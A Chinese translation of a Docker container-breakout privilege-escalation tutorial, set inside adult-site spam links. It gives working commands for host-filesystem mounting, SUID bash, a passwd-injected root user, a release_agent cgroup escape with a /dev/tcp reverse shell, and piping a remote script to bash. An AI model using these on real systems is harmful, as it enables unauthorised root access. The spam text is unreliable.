国产秋霞理论久久久电影-婷婷色九月综合激情丁香-欧美在线观看乱妇视频-精品国avA久久久久久久-国产乱码精品一区二区三区亚洲人-欧美熟妇一区二区三区蜜桃视频

Linux 提權(quán)-Docker 容器

共 13228字,需瀏覽 27分鐘

 ·

2024-06-30 22:11

本文通過 Google 翻譯 Docker Breakout – Linux Privilege Escalation 這篇文章所產(chǎn)生,本人僅是對機(jī)器翻譯中部分表達(dá)別扭的字詞進(jìn)行了校正及個別注釋補(bǔ)充。


導(dǎo)航

  • 0 前言

  • 1 什么是 Docker ?

  • 2 尋找 Docker 權(quán)限

    • 2.1 升級 Shell 到完整 TTY

    • 2.2 手動枚舉 Docker 組中的用戶

    • 2.3 手動枚舉 Docker 服務(wù)

    • 2.4 手動枚舉 Docker 鏡像和默認(rèn)用戶

    • 2.5 工具枚舉 Docker – LinPEAS

  • 3 場景1:通過濫用 Docker 組權(quán)限提權(quán)

    • 3.1 在 GTFOBins 上查找 Docker 利用

    • 3.2 在 Docker 容器中掛載宿主機(jī)文件系統(tǒng)

    • 3.3 突破 Docker 容器以獲取宿主機(jī) Root 權(quán)限

  • 4 場景2:直接在特權(quán)容器中立足

    • 4.3.1 添加 "root" 用戶

    • 4.3.2 登錄 "root" 用戶

    • 4.1 確認(rèn)處于 Docker 容器中

    • 4.2 確認(rèn)這是一個特權(quán)容器

    • 4.3 突破特權(quán)容器

  • 5 場景3:直接在非特權(quán)容器中立足

    • 5.3.1 找到很多關(guān)于容器的好信息

    • 5.2.1 查找已啟用的有趣功能 – CAP_SYS_ADMIN

    • 5.2.2 確認(rèn) AppArmor 未加載

    • 5.1 確定這不是特權(quán)容器

    • 5.2 尋找其它突破方法

    • 5.3 使用工具尋找 Docker 突破口 – LinPEAS

    • 5.4 使用 release_agent Breakout 2 方法突破非特權(quán)容器


0、前言

在本文中,我們將探索使用 Docker 突破技術(shù)在目標(biāo) Linux 主機(jī)上提升權(quán)限。

我們將回顧三種不同的 Docker 突破場景。在每種場景中,我們都會看到一種可以用來突破 Docker 容器的不同技術(shù),而每種情況都會讓我們在目標(biāo)主機(jī)上獲得 root shell!

首先,我們要在目標(biāo)主機(jī)上站穩(wěn)腳跟,然后經(jīng)過手動枚舉,我們會發(fā)現(xiàn)當(dāng)前用戶已加入 docker 組。發(fā)現(xiàn)這一點(diǎn)后,我們將枚舉 docker 服務(wù),并收集我們所需的信息,以便投入到 docker 容器中。我們通過使用 GTFOBins 找到一個利用,使我們能夠以 root 身份操縱實(shí)際的文件系統(tǒng)。

另一種場景是,我們在目標(biāo)系統(tǒng)中獲得了立足點(diǎn);然而,我們會發(fā)現(xiàn),我們的立足點(diǎn)實(shí)際上是在目標(biāo)主機(jī)上運(yùn)行的 docker 實(shí)例中。然后,我們將列舉容器內(nèi)的一些東西,這些東西將表明我們實(shí)際上是在一個有特權(quán)的容器內(nèi),而脫離容器將變的輕而易舉。

最后一種場景與上一種場景類似,只是我們會發(fā)現(xiàn)我們并不在特權(quán)容器中。但幸運(yùn)的是,經(jīng)過枚舉會發(fā)現(xiàn)我們實(shí)際上擁有正確的權(quán)限組合,可以讓我們突破 docker 容器,從而在宿主機(jī)上獲得 root shell。

1、什么是 Docker ?

Docker 是一個開放平臺,用于開發(fā)、發(fā)布和運(yùn)行獨(dú)立于主機(jī)基礎(chǔ)設(shè)施的應(yīng)用程序。

使用 Docker 可以將應(yīng)用程序打包并在一個稱為容器的松散隔離環(huán)境中運(yùn)行。這種隔離和安全性允許許多容器同時(shí)在指定主機(jī)上運(yùn)行。

容器是輕量級的,包含運(yùn)行應(yīng)用程序所需的一切。

Docker 使用客戶端-服務(wù)器架構(gòu)。Docker 客戶端與 Docker 守護(hù)進(jìn)程通信,后者負(fù)責(zé)構(gòu)建和運(yùn)行 Docker 容器的繁重工作。

作為攻擊者,我們可以看到 docker run 是上面三個客戶端命令中最有趣的,因?yàn)樗茏屛覀冞M(jìn)入一個容器。

關(guān)于 Docker,還有一些其他有趣的事情需要記住,這將有助于我們定位這項(xiàng)服務(wù):

  • docker 容器通常以 root 作為默認(rèn)用戶運(yùn)行。

  • 默認(rèn)情況下,容器以 root 身份運(yùn)行,因?yàn)?nbsp;dockerd(docker 守護(hù)進(jìn)程)默認(rèn)也以 root 身份運(yùn)行。

  • 容器啟動選項(xiàng) –privileged 為容器提供了所有功能。換句話說,容器幾乎可以做主機(jī)能做的所有事情。

  • docker 組中的用戶對于 docker 服務(wù)而言相當(dāng)于 root。

注:此處及后文提到的 docker 容器用戶和 docker 進(jìn)程用戶并非同一個身份。

docker 容器用戶:指進(jìn)入容器之后,在容器操作環(huán)境中的用戶身份。

docker 進(jìn)程用戶:指容器外部 docker 守護(hù)進(jìn)程是以宿主機(jī)的哪個用戶身份去運(yùn)行的。

考慮到所有這些,讓我們來看一些例子!

2、尋找 Docker 權(quán)限

對于此示例,我們假設(shè)以標(biāo)準(zhǔn)用戶 dawker 在目標(biāo) Linux 主機(jī)上獲得了立足點(diǎn)。

2.1、升級 Shell 到完整 TTY

站穩(wěn)腳跟后我們要做的第一件事就是將 shell 升級為完整的 TTY。我們可以使用以下命令集來完成此操作:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL + Z
stty raw -echo;fg
export TERM=xterm

現(xiàn)在有了完整的 TTY,我們可以使用箭頭瀏覽命令歷史記錄、使用制表符補(bǔ)全、清除終端等。

完整 TTY 對于我們將要使用的漏洞利用來說還是很有必要的。

2.2、手動枚舉 Docker 組中的用戶

一旦建立了完整的 TTY,應(yīng)該執(zhí)行的第一對命令是 whoami 和 id。這將向我們顯示當(dāng)前是哪個用戶以及哪個組。

whoami ; id

在這里可以看到當(dāng)前用戶是一個名為 dawker 的標(biāo)準(zhǔn)用戶。然而,在該用戶所屬的組列表中,我們可以看到一個有趣的發(fā)現(xiàn)--當(dāng)前用戶已位于 docker 組中!

加入 docker 組是一個有趣的發(fā)現(xiàn),因?yàn)槿绻?docker 使用的是默認(rèn)配置,那么 root 權(quán)限就是有保障的。

但大多數(shù)時(shí)候,我們不會直接就以 docker 組中的用戶身份在目標(biāo)主機(jī)上立足,因此,我們需要對 docker 組中的用戶進(jìn)行水平提權(quán),然后才能獲得 root 權(quán)限。

如果是這種情況,那么我們可以使用以下 for 循環(huán) 來尋找 docker 組中的用戶:

for user in $(cat /etc/passwd | awk -F: '{print $1}');do echo "$user" ; id "$user" ;done | grep -B 1 "docker"

這個 for 循環(huán)執(zhí)行以下操作:

  • 首先,使用 cat /etc/passwd 查看系統(tǒng)上的所有用戶,然后使用awk 只輸出用戶名字段。

  • 接下來,循環(huán)回顯每個用戶名并對它們執(zhí)行 id 命令。

  • 最后,使用 grep 只抓取其中包含 “docker” 的結(jié)果。

以上執(zhí)行結(jié)果也向我們表明第二個用戶 “devops” 也在 docker 組中。而如果我們以既不是 “devops” 也不是 “dawker” 的用戶身份進(jìn)入 shell,那么我們會想要尋找一種方法來水平提權(quán)到其中一個用戶。

2.3、手動枚舉 Docker 服務(wù)

幸運(yùn)的是,我們發(fā)現(xiàn)當(dāng)前用戶正好位于 docker 組中。

那么接下來,我們需要進(jìn)一步枚舉 docker 服務(wù),以確定是否可以濫用 docker 組權(quán)限提升到 root。

此處跑題開始

首先需要確定的是,我們是否可以掛載 docker 套接字。如果發(fā)現(xiàn)套接字可以寫入,我們就可以有效地使用 docker 命令并將其放入容器中。

find / -name docker.sock 2>/dev/null

運(yùn)行 find 命令后,docker.sock 文件的位置就暴露了。找到后,我們可以檢查該文件的權(quán)限。

ls -l /run/docker.sock

在這里,我們可以看到 docker.sock 文件對 docker 組中的用戶是可寫的!這意味著我們可以用當(dāng)前用戶操作及登錄容器。

注:該部分的主題以枚舉 docker 服務(wù)為主,而此處的描述有些跑題,顯得詞不達(dá)意,但依舊值得去學(xué)習(xí)。

套接字 docker.sock 文件相當(dāng)于是 Docker 守護(hù)進(jìn)程的一個 API 接口,多用于容器與守護(hù)進(jìn)程通信以操作管理守護(hù)進(jìn)程,通俗易理解示例如 docker.ui 容器管理容器。

也就是說,如果我們能夠有權(quán)讀寫 docker.sock 文件,即便不是 root 用戶、不在 docker 組中,我們也依舊可以通過一些特殊操作去管理容器(創(chuàng)建、查看、交互)。

參考:特殊操作1、特殊操作2

此處跑題結(jié)束

接下來我們要枚舉的是 docker 服務(wù)。理想情況下,我們希望該服務(wù)不是在無根模式下運(yùn)行。

使用無根模式,Docker 容器和守護(hù)進(jìn)程都會在定義的用戶命名空間內(nèi)運(yùn)行。這樣,守護(hù)進(jìn)程就可以在沒有 root 權(quán)限的情況下運(yùn)行。

ps -ef | grep -i "docker"

Great!在這里,我們可以看到 docker 守護(hù)進(jìn)程是以 root 的身份運(yùn)行的,這意味著我們可以以 root 的身份在容器外執(zhí)行命令

注:在場景1中,在容器中進(jìn)行的拷貝賦權(quán)等操作同樣作用到了容器外部的系統(tǒng)上面,而這些操作在容器外部本應(yīng)該是以 root 身份去進(jìn)行的,但由于 docker 進(jìn)程是 root 身份運(yùn)行的,故這些在容器中的操作也同樣有了 root 身份的加持。

繼續(xù)往下看,我們應(yīng)該進(jìn)一步列舉 docker 是如何配置的,以確定在創(chuàng)建容器并登錄容器后使用的是哪個身份的用戶。

2.4、手動枚舉 Docker 鏡像和默認(rèn)用戶

Docker 容器總是以 root 作為默認(rèn)用戶運(yùn)行,除非在 Dockerfile 或啟動命令行中另有指定。

確定該主機(jī)上的容器是否以 root 作為默認(rèn)用戶運(yùn)行的最佳方法是簡單地啟動一個容器。

首先,我們看下目標(biāo)主機(jī)上現(xiàn)有的 docker 鏡像有哪些,可以使用以下命令:

docker images

可以看到,這里安裝了一個 Alpine 鏡像,因此我們可以記下存儲庫名稱 “alpine”,以便在啟動容器時(shí)使用該名稱。

在啟動容器時(shí),您還可以使用映像 ID 代替存儲庫名稱。

接著,我們啟動一個容器,該容器將運(yùn)行單個命令 (whoami),然后自行銷毀。

docker run --rm -it alpine sh -c "whoami"

Amazing!主機(jī)使用默認(rèn)配置,容器以 root 作為默認(rèn)用戶運(yùn)行!

現(xiàn)在我們已經(jīng)列舉了這項(xiàng)服務(wù),并確認(rèn)它存在漏洞,那么我們就可以尋找漏洞來提升權(quán)限。

然而,在我們這樣做之前,讓我們看看 LinPeas 是如何枚舉信息的。

2.5、工具枚舉 Docker – LinPEAS

LinPEAS 是一款終極的后滲透枚舉工具,本文中關(guān)于它在受害者機(jī)器上進(jìn)行的傳輸、執(zhí)行等過程不再累述,我們只關(guān)注在腳本執(zhí)行結(jié)束之后關(guān)于輸出結(jié)果的梳理,看看 LinPEAS 枚舉效果如何。

LinPEAS 首先要做的檢查之一是 "Basic Information",它基本上是通過幾個簡單的命令來提供高級信息。

這里運(yùn)行的簡單命令之一是 id,它立即向我們顯示當(dāng)前用戶位于 docker 組中。

接著,我們來到 “Processes, Crons, Timers, Services and Sockets” 部分,在這里我們可以看到 dockerd 進(jìn)程由 root 擁有。

令人驚訝的是,這甚至不是一個紅色發(fā)現(xiàn),這意味著如果我們不知道尋找它,它很容易會被忽視。

在同一部分中進(jìn)一步向下滾動。我們將會遇到 Unix Sockets。在這里我們會發(fā)現(xiàn) docker.sock 文件是可寫的。

過去,可寫的 docker.sock 結(jié)果總是紅色/黃色。但在最新版本的 LinPEAS 中(本文撰寫時(shí)),這只是一個紅色結(jié)果。

下一部分我們將在 “User Information” 部分找到有關(guān) docker 的信息。

在這里,我們可以看到針對當(dāng)前用戶再次發(fā)出的 id 命令。再往下一點(diǎn),我們還可以看到 docker 組中的所有用戶。

最后,當(dāng)我們繼續(xù)向下滾動時(shí),我們將看到 “docker files”,但在這個例子中它們都不是重點(diǎn)。

以上結(jié)果表明,LinPEAS 能夠像手動操作一樣枚舉 docker 服務(wù)。

請記住,LinPEAS 并不會嘗試枚舉容器鏡像,也不會檢查容器是否以 root 作為默認(rèn)用戶運(yùn)行。

現(xiàn)在,我們已經(jīng)了解了如何枚舉 docker 服務(wù)、鏡像和默認(rèn)用戶,接下來讓我們看看如何利用我們發(fā)現(xiàn)的內(nèi)容繼續(xù)利用該服務(wù)。

3、場景1:通過濫用 Docker 組權(quán)限提權(quán)

之前我們了解了如何枚舉容器中的默認(rèn)用戶,而默認(rèn)用戶恰好是 root。進(jìn)行枚舉時(shí),我們使用 docker run 命令啟動容器來執(zhí)行單條命令。

與我們啟動容器來運(yùn)行單條命令類似,我們也可以啟動容器并進(jìn)入 shell 中,以與其進(jìn)行命令交互。

docker run --rm -it alpine sh

這一次,我們進(jìn)入了一個帶有文件系統(tǒng)的容器,不過請注意,在這個文件系統(tǒng)中的 root 與在宿主機(jī)上的 root 是并不相同的。

3.1、在 GTFOBins 上查找 Docker 利用

那么我們?nèi)绾尾拍軓娜萜髦械?root 轉(zhuǎn)到實(shí)際主機(jī)上的 root 呢?答案就在于 docker run 命令以及我們?nèi)绾螁尤萜鳌?/p>

由于漏洞利用依賴于 docker 命令,因此我們可以檢查 GTFOBins 以查找漏洞利用。

我們知道當(dāng)前的用戶正好位于 docker 組中,而這也正好符合上面 docker 命令的使用條件,這也就意味著我們可以利用它并獲得 root 權(quán)限!

GTFOBins 給出的利用命令有很多選擇,但 “shell” 絕對是最有趣的。

這告訴我們,我們可以擺脫受限環(huán)境并獲得 root shell,這太完美了!

上面的命令會將宿主機(jī)文件系統(tǒng)掛載到容器內(nèi)的 /mnt 目錄,然后將我們放入 /mnt 中的 shell 中。本質(zhì)上,我們將成為容器內(nèi)的 root,但實(shí)際上會與宿主機(jī)的文件系統(tǒng)進(jìn)行交互。

3.2、在 Docker 容器中掛載宿主機(jī)文件系統(tǒng)

由于目標(biāo)主機(jī)上的鏡像文件也是 alpine,因此我們可以使用 GTFOBins 中的命令,而無需對其進(jìn)行編輯。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

現(xiàn)在,當(dāng)我們執(zhí)行 ls 命令時(shí),我們看到列出了更多的目錄。這是因?yàn)槲覀兛吹降氖撬拗鳈C(jī)文件系統(tǒng)上的目錄!

因?yàn)槲覀儝燧d了宿主機(jī)文件系統(tǒng),所以我們對文件或目錄所做的任何更改也將反映在宿主機(jī)的文件系統(tǒng)上。

不過,事實(shí)是,我們?nèi)栽?docker 容器中。所以,讓我們看看如何才能擺脫困境,在真正的主機(jī)上獲得 root!

3.3、突破 Docker 容器以獲取宿主機(jī) Root 權(quán)限

由于我們已經(jīng)掛載了宿主機(jī)的文件系統(tǒng),因此突破 docker 容器將是輕而易舉的。

我們可以使用一些很好的技術(shù)來突破這個容器,但是在這個例子中,我們將通過制作 SUID bash 二進(jìn)制文件來提升到 root 權(quán)限。

cp /bin/bash /tmp/bash
chmod +s /tmp/bash
ls -l /tmp

Amazing!我們可以看到 SUID bash 二進(jìn)制文件已在 /tmp 目錄中創(chuàng)建。

現(xiàn)在,當(dāng)我們從容器中退出時(shí),應(yīng)該會在實(shí)際主機(jī)上看到相同的 SUID bash 二進(jìn)制文件。

確認(rèn)文件位于宿主機(jī)上后,我們只需運(yùn)行以下命令即可進(jìn)入 root shell:

/tmp/bash -p

Awesome!我們成功脫離了 docker 容器,并在宿主機(jī)上獲得了 root shell。

4、場景2:直接在特權(quán)容器中立足

上一種場景中,我們先是在外部利用主機(jī)并獲得了一個普通用戶 shell。但這一次,當(dāng)我們站穩(wěn)腳跟時(shí),似乎立刻就獲得了 root ?

此時(shí)此刻,我們還不確定自己是否在容器中。

在此示例中,我們使用 netcat 立足,因此我們應(yīng)該像之前一樣嘗試升級到完整的 TTY。

好吧,既然我們是 root,我們不妨看看是否可以查看 /root 目錄中的文件。

有趣的是,我們在這里什么也沒看到,這時(shí)候我們就應(yīng)該開始懷疑自己是不是在一個 docker 容器中。

4.1、確認(rèn)處于 Docker 容器中

我們可以使用幾種方法來檢查自己是否處于 docker 容器中。

首先,12 個隨機(jī)數(shù)字/字母組合作為主機(jī)名是一個常見的標(biāo)志,表明我們位于 docker 容器中。

另一個要找的東西是文件系統(tǒng)根目錄下的 .dockerenv 文件。如果我們看到了這個文件,那么很有可能我們是在一個容器中。

ls -la /

最后,確認(rèn)我們是否處于 docker 容器中的最佳方法是檢查 cgroup 進(jìn)程。

cat /proc/1/cgroup

看到所有屬于 docker 的控制組,就能確認(rèn)我們確實(shí)是在一個 docker 容器中。

4.2、確認(rèn)這是一個特權(quán)容器

由于直接立足于 docker 容器,因此我們這次就不能使用 docker run 命令進(jìn)行漏洞利用。相反,我們必須從 docker 容器內(nèi)部進(jìn)行枚舉以確定是否設(shè)置了 –privileged 標(biāo)志。

有很多方法可以判斷在啟動容器時(shí)是否使用了 –privileged 標(biāo)志,從 fdisk 命令開始。

fdisk -l | grep -A 10 -i "device"

由于我們能夠列出設(shè)備,因此基本上可以確認(rèn)我們是在一個有權(quán)限的容器中。在非特權(quán)容器中,這條命令將被拒絕執(zhí)行。

檢查我們是否處于特權(quán)容器中的另一種方法是檢查狀態(tài)進(jìn)程中的 seccomp 值。

cat /proc/1/status | grep -i "seccomp"

看到兩個字段都為 0 清楚地表明這是一個特權(quán)容器。在非特權(quán)容器中,我們將分別看到 2 和 1。

最后,我們還可以進(jìn)行一項(xiàng)檢查,也許是最簡單的一項(xiàng)檢查,就是查看 /dev 目錄中有多少文件。

ls /dev

在 /dev 中看到大量文件和子目錄,證明這是一個特權(quán)容器。在非特權(quán)容器中,我們不會在其中看到如此多的文件。

4.3、突破特權(quán)容器

現(xiàn)在我們已經(jīng)確定我們處于一個特權(quán)容器中,下一步就是突破它。

與上一個示例類似,我們將掛載宿主機(jī)文件系統(tǒng)以突破容器。這次的不同之處在于我們需要從 docker 容器內(nèi)部掛載它。

首先,我們需要找到屬于主機(jī)的驅(qū)動器,以便掛載它。

df -h

在這里,我們可以看到 sda5 是主機(jī)驅(qū)動器,這也是我們在前面的 fdisk 命令輸出中看到的。

有了主機(jī)驅(qū)動器的名稱,我們現(xiàn)在可以掛載它,然后從 Docker 內(nèi)部訪問主機(jī)上的所有文件。

mkdir -p /mnt/juggernaut
mount /dev/sda5 /mnt/juggernaut
ls -l /mnt/juggernaut

Great!我們成功掛載了宿主機(jī)文件系統(tǒng),現(xiàn)在我們可以 root 身份與其交互。

盡管我們擁有宿主機(jī)文件系統(tǒng)的 root 訪問權(quán)限,但事實(shí)是我們?nèi)匀辉谌萜髦?。所以現(xiàn)在我們需要突破容器以獲得實(shí)際主機(jī)上的 root shell。

但與上次不同的是,我們無法復(fù)制 bash 并設(shè)置 SUID 位,因?yàn)槲覀冊谥鳈C(jī)上沒有立足點(diǎn)來執(zhí)行它。

相反,我們需要做一些不同的事情來獲取 root shell。

對于本例,我們要做的是創(chuàng)建一個 root 用戶,然后使用它通過 SSH 連接到主機(jī)。

注:此處必須要了解 docker 容器和宿主機(jī)之間的網(wǎng)絡(luò)模式,本例容器的網(wǎng)絡(luò)模式必須是 host 模式,也就是容器相當(dāng)于一個應(yīng)用部署在宿主機(jī)上,和宿主機(jī)使用共同的網(wǎng)卡、共同的 ip ,且假設(shè)宿主機(jī)已運(yùn)行 ssh 服務(wù)。若容器使用其它的網(wǎng)絡(luò)模式,則下列方法無效。

4.3.1、添加 “root” 用戶

由于宿主機(jī)文件系統(tǒng)掛載在容器中,因此通過編輯容器內(nèi)部的 passwd 文件,更改也會發(fā)生在宿主機(jī)上。

首先,我們需要在攻擊者計(jì)算機(jī)上為 root 用戶生成密碼哈希。

openssl passwd -1 -salt r00t password123

獲得哈希值后,我們可以獲取此信息并將其輸入以下命令,以將新行附加到 passwd 文件中,創(chuàng)建一個名為 r00t 的新 root 用戶:

echo 'r00t:$1$r00t$HZoYdo0F7UZbuKrEXMcah0:0:0:/dev/shm/pwnt:/bin/bash' >> /mnt/juggernaut/etc/passwd

4.3.2、登錄 “root” 用戶

Perfect!我們的 root 用戶已經(jīng)創(chuàng)建了?,F(xiàn)在我們需要做的就是通過 SSH 連接到主機(jī),我們就擁有了 root shell!

因?yàn)槲覀儗⒂脩?id 和組 id 設(shè)置為0,所以這個新用戶和內(nèi)置的 root 是一樣的。只要 UID 和 GID 為 0,所有 "root" 都是平等的。

ssh r00t@172.16.1.150

BOOM!就這樣,我們無需先在宿主機(jī)上站穩(wěn)腳跟,就能脫離 docker 容器!

5、場景3:直接在非特權(quán)容器中立足

正如我們在上一個例子中所看到的,我們從外部利用了同一臺主機(jī),并再次直接在 docker 容器中獲得了立足點(diǎn)。

對于這個例子,假設(shè)我們已經(jīng)升級到完整 TTY,并且我們還確認(rèn)自己就是處于 docker 容器中。

接下來,我們需要檢查這是否是一個特權(quán)容器。

5.1、確定這不是特權(quán)容器

就像上一個例子一樣,我們首先檢查是否可以使用 fdisk 命令。

fdisk -l | grep -A 10 -i "device"

這次我們什么也沒看到!這是一個早期跡象,表明我們并不處于特權(quán)容器中。但是,我們繼續(xù)檢查……

cat /proc/1/status | grep -i "seccomp"

Ouch! 分別看到 2 和 1,說明該容器沒有使用 -privileged 標(biāo)記運(yùn)行。

為了查看我們之前所做的三項(xiàng)檢查中特權(quán)和非特權(quán)之間的區(qū)別,我們還可以檢查 /dev 以確認(rèn)這不是一個特權(quán)容器。

ls /dev

與在特權(quán)容器中相比,在 /dev 中幾乎看不到任何文件或子目錄,這進(jìn)一步表明該容器沒有特權(quán)。

那么,如果容器沒有特權(quán),我們該如何逃生呢?這取決于該容器是否被授予了任何權(quán)限。如果設(shè)置的是默認(rèn)權(quán)限,那么我們很可能無法逃出。

5.2、尋找其它突破方法

如果容器擁有默認(rèn)權(quán)限,那么它基本就被鎖定了。不過,我們?nèi)詰?yīng)檢查是否授予了任何權(quán)限。如果我們運(yùn)氣好,啟用了正確的組合,我們就可以逃出這個容器。

5.2.1、查找已啟用的有趣功能 – CAP_SYS_ADMIN

我們首先要檢查的是,我們是否啟用了任何可以幫助我們突圍的功能。

capsh --print

在這里,我們可以看到在容器中啟用 CAP_SYS_ADMIN 的一個重要功能。有很多功能可用于突破 docker 容器,但這個功能是迄今為止最好用的功能。

需要使用 CAP_SYS_ADMIN 來執(zhí)行容器內(nèi)所需的一系列管理操作。如果在容器內(nèi)執(zhí)行特權(quán)操作,但沒有使用 -privileged 標(biāo)記,那么該功能很可能是為 "最小特權(quán)原則 " 而設(shè)置的。

由于我們發(fā)現(xiàn)在此容器中啟用了 CAP_SYS_ADMIN,因此我們需要重點(diǎn)關(guān)注專門使用此功能的漏洞利用。

對我們來說幸運(yùn)的是, Felix Wilhelm 發(fā)現(xiàn)了一個漏洞,只要滿足 2 個條件,攻擊者就可以突破 docker 容器:啟用 CAP_SYS_ADMIN 、 AppArmor 停止或未加載。

5.2.2、確認(rèn) AppArmor 未加載

根據(jù)這次攻擊的要求,我們需要做的就是檢查 AppArmor 是否正在運(yùn)行。如果幸運(yùn)的話,我們發(fā)現(xiàn)它沒有被加載或停止運(yùn)行,那么我們就可以突破這個容器并在宿主機(jī)上獲得 root 權(quán)限!

要檢查 AppArmor 是否正在運(yùn)行,我們所要做的就是檢查一個文件,即 /sys/kernel/security/apparmor/profiles 文件。

如果檢查 /sys/kernel/security/apparmor/profiles 的內(nèi)容,顯示 一堆 profile 列表,則表明 AppArmor 正在運(yùn)行;如果顯示 空文件且不返回任何內(nèi)容,則表明 AppArmor 已停止;如果提示該文件不存在,則表明 AppArmor 未被加載。

到了關(guān)鍵時(shí)刻……

cat /sys/kernel/security/apparmor/profiles

Perfect!我們檢查該文件后發(fā)現(xiàn)它不存在,這意味著 AppArmor 未被加載!

由于 AppArmor 未加載且 CAP_SYS_ADMIN 已啟用,因此我們擁有突破此容器所需的兩個條件,即便該容器啟動時(shí)并未設(shè)置 –privileged 標(biāo)志。

然而,在我們了解如何突破這個容器之前,讓我們再來看看 LinPEAS 在容器內(nèi)部的枚舉效果如何。。

5.3、使用工具尋找 Docker 突破口 – LinPEAS

假設(shè)一切都已設(shè)置完畢并準(zhǔn)備就緒(HTTP 服務(wù)器在攻擊者上運(yùn)行以提供 LinPEAS),我們需要做的就是下載并執(zhí)行 LinPEAS。

curl 172.16.1.30/linpeas.sh | bash

首先,我們會注意到測試結(jié)果是以 root 身份運(yùn)行的。不幸的是,這會導(dǎo)致一些誤報(bào)。

因?yàn)槲覀兪?root,所以我們會看到很多紅色/黃色的結(jié)果。為了消除噪音,實(shí)際上,在運(yùn)行 LinPEAS 之前,我們已經(jīng)進(jìn)行了一些手動枚舉,以確定我們是處在容器中。了解了這一點(diǎn),我們就可以避開噪音,直接獲取我們想知道的信息。

如果我們向下滾動一點(diǎn),我們將看到 “Protections”,在這里我們可以看到容器中啟用了哪些安全功能。

這告訴我們 seccomp 已啟用,但 AppArmor 是 “unconfined”,這意味著我們應(yīng)該能夠使用 mount 命令。

啟用 AppArmor 后,您將無法使用 mount 命令,權(quán)限將被拒絕。

5.3.1、找到很多關(guān)于容器的好信息

在 “Protections” 小節(jié)下方,我們將看到 “Container” 部分,這里是我們了解容器配置最多的地方。

在這里我們可以看到 LinPEAS 已經(jīng)確定我們處于一個容器中,并且它表明 AppArmor 是 “unconfined”。然而,最有趣的發(fā)現(xiàn)是 docker 很容易受到 “release_agent breakout” 1 和 2 的影響。

接下來,如果我們再向下滾動一點(diǎn),我們可以看到“Container Capabilities”。

本節(jié)以外的其余檢查都是標(biāo)準(zhǔn)檢查,由于已經(jīng)是 root,所以它們充滿了紅色/黃色發(fā)現(xiàn)的誤報(bào)。

LinPEAS 在枚舉容器內(nèi)部方面做得很好。它能夠找到我們通過手動枚舉找到的所有信息;然而,真正的好處是 LinPEAS 可以根據(jù)當(dāng)前權(quán)限集檢查可以使用的不同突破方法。

5.4、使用release_agent Breakout 2 方法突破非特權(quán)容器

通過枚舉 docker 容器,我們發(fā)現(xiàn)應(yīng)該能夠使用 “release_agent breakout 2” 方法進(jìn)行突破。

現(xiàn)在讓我們看看如何使用此技術(shù)進(jìn)行突破并以 root 身份獲得反向 shell!

首先,我們需要掛載 RDMA cgroup 控制器并創(chuàng)建一個子 cgroup。

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

完成后,我們需要在“x”cgroup 發(fā)布時(shí)啟用 cgroup 通知。

echo 1 > /tmp/cgrp/x/notify_on_release

接下來,我們需要找到容器的 OverlayFS 的掛載路徑。

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

設(shè)置完畢后,下一步是將 release_agent 設(shè)置為 /path/payload

echo "$host_path/breakout" > /tmp/cgrp/release_agent

現(xiàn)在,我們將制作有效載荷,它將是通過端口 443 到達(dá)我們攻擊者機(jī)器的反向 shell。

echo '#!/bin/bash' > /breakout
echo 'bash -i >& /dev/tcp/172.16.1.30/443 0>&1' >> /breakout

接下來,我們只需要為有效載荷添加執(zhí)行權(quán)限,然后返回到我們的攻擊者機(jī)器在端口 443 上設(shè)置一個 netcat 監(jiān)聽器。

chmod a+x /breakout

回到我們的攻擊者機(jī)器上......

nc -nvlp 443

最后,再次回到受害者,我們現(xiàn)在可以使用以下命令執(zhí)行我們的有效負(fù)載:

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

關(guān)鍵時(shí)刻,我們獲得了 root shell。

Amazing!即使啟動容器沒有設(shè)置 –privileged 標(biāo)志,我們也能夠突破并獲得主機(jī)的 root 權(quán)限!當(dāng)然,要使此漏洞發(fā)揮作用,確實(shí)需要設(shè)置一些權(quán)限。

鏈接:https://www.cnblogs.com/kqdssheng/p/18275541

(版權(quán)歸原作者所有,侵刪)

瀏覽 213
點(diǎn)贊
評論
收藏
分享

手機(jī)掃一掃分享

分享
舉報(bào)
評論
圖片
表情
推薦
點(diǎn)贊
評論
收藏
分享

手機(jī)掃一掃分享

分享
舉報(bào)

感谢您访问我们的网站,您可能还对以下资源感兴趣:

国产秋霞理论久久久电影-婷婷色九月综合激情丁香-欧美在线观看乱妇视频-精品国avA久久久久久久-国产乱码精品一区二区三区亚洲人-欧美熟妇一区二区三区蜜桃视频 99久久婷婷国产精品2020| 肏亚洲美女| 国产精品成人午夜福利| 日韩aaaaaa| 大香蕉在线网站| 日韩黄色精品| 996精品在线| 日本少妇电影| 91人妻在线| 麻豆91在线| 国产色五月| 无套内射免费视频| 中文字幕无码在线| 九九色影院| 欧美色址| 精品国产久久久久久| 青草网在线观看| 国产最新av| 超碰亚洲| 欧美亚洲视频在线观看| 国产视频久久久| 午夜黄色大片| 天堂无码视频在线播放| 九九亚洲| 亚洲精品三级在线观看| 99热r| 人人爽网站| 青青操成人在线视频| 午夜褔利| 一本色道久久综合狠狠躁的推荐| 精品在线免费观看| 日日夜夜老司机| 国产女人高潮毛片| 国产欧美日韩在线观看| 日韩精品无码电影| AV一区二区三区| 亚洲综合在线网| 无码专区亚洲| 亚洲色一| 欧美色啪| 西西4444www无码精品| 黑人一级片| 亚洲精品在线观看视频| 再深点灬好爽灬轻点久久国产| 成人V| 大香蕉伊人色| 中文字幕在线无码观看| 国产玖玖爱| 91搞一搞| 日韩无码人妻| 午夜性爱网| 一本无码视频| 欧一美一婬一伦一区二区三区自慰国 | 国产乱子伦真实精品!| 国产特级婬片免费看| 狠狠爱av| 日韩无码成人电影| 欧洲精品在线观看| 在线观看者亚洲| 香蕉网址| 亚洲精品久久久久久久久豆丁网 | 欧美日本成人网站入口| 无码激情视频| 老骚老B老太太BBW| 男人天堂网在线| 天天操b| 超碰A片| 精品欧美一区二区三区久久久| 日韩夜夜操| 亚洲成人无码视频在线观看| 免费涩涩无遮挡18国产| 国产91在线看| 黑人在线播放| 亚洲群交| 亚洲欧美另类在线| 波多野结衣无码AV在线| 五月天福利视频| 男人的天堂aa| 人人操人人妻人人爽| 91大神在线免费观看| 91一区二区在线播放精品| 欧美色一级| www.爆操| 日日夜夜爽歪歪| 国产AV资源| 